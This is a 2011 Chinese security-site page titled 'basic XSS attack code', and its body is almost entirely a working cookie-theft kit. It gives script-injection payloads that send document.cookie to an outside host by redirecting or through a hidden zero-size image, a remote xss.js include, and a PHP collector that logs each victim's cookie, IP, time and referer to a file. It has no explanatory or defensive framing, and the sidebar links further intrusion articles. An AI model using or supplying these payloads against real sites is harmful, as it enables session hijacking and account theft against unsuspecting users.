首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
XSS漏洞基本攻击代码
来源:vfocus.net 作者:vfocus 发布时间:2011-05-06  

javascript

<script>alert(document.cookie);</script>


<script>document.location.replace('http://www.20060801.com/xss/getcookie.php?c='+document.cookie);</script>

document.write('<img
src="http://www.20060801.com/xss/getcookie.php?c='+document.cookie+'"
width=0 height=0 border=0 />');

<script
src=http://www.20060801.com/xss/xss.js></script>

xss.js

document.write('<img
src="http://www.20060801.com/xss/getcookie.php?c='+document.cookie+'"
width=0 height=0 border=0 />');

getcookie.php

<?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$time=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('victim.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');

fclose($fp);

?>



 
[推荐] [评论(5条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
·Metasploit 权限提升
  相关文章
·XSS偷取密码Cookies通用脚本
·XSS(跨站)偷cookie的代码
·Xss获取管理员后台地址实战
·渗透校内网——XSS过程详解
·mysql可多语句执行下不用单引号o
·高级PHP手工注入
·xss跨站脚本攻击大全
·微软的“后门”:NTSD.exe,的远
·1433终极入侵之沙盒模式
·linux不提权跨目录访问的代码
·Firefox攻击技巧总结
·入侵纽约大学过程
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved